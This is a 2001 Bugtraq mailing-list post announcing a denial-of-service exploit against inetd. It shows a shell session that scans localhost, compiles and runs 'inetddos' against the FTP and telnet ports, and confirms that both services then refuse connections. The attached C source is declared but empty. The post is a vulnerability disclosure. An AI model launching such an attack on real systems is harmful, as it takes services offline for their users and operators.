Date: Sun, 25 Feb 2001 19:26:07 +0300
From: Serega[linux] <linux@IHGROUP.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: inetd DoS exploit

--Boundary-=_nWlrBbmQBhCDarzOwKkYHIDdqSCD
Content-Type: text/plain
Content-Transfer-Encoding: 8bit

Name: inetd DoS exploit
Author: Serega[Linux]

[ser@ihg prog]$ ./pscaner -h 127.0.0.1    /* it's my port scanner */
Open ports on [127.0.0.1]
-----------------------------
[21] OPEN : 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready.
[23] OPEN :
[25] OPEN : 220 ihg.localhost ESMTP Sendmail 8.11.0/8.11.0; Sun, 25 Feb 2001 18:58:36 +0300
-----------------------------

[ser@ihg prog]$ telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready.

[ser@ihg prog]$ cc inetddos.c -o inetddos
[ser@ihg prog]$ ./inetddos 127.0.0.1 21
DoS OK
[ser@ihg prog]$ telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
[ser@ihg prog]$ telnet 127.0.0.1 23
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
login:

[ser@ihg prog]$ ./inetddos 127.0.0.1 23
DoS OK
[ser@ihg prog]$ telnet 127.0.0.1 23
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused

--
/*
 * mailto:linux@ihgroup.ru
 * ICQ: 64432299
 * Home Page: http://127.0.0.1
 */

--Boundary-=_nWlrBbmQBhCDarzOwKkYHIDdqSCD
Content-Type: text/x-c; name="inetddos.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="inetddos.c"
--Boundary-=_nWlrBbmQBhCDarzOwKkYHIDdqSCD--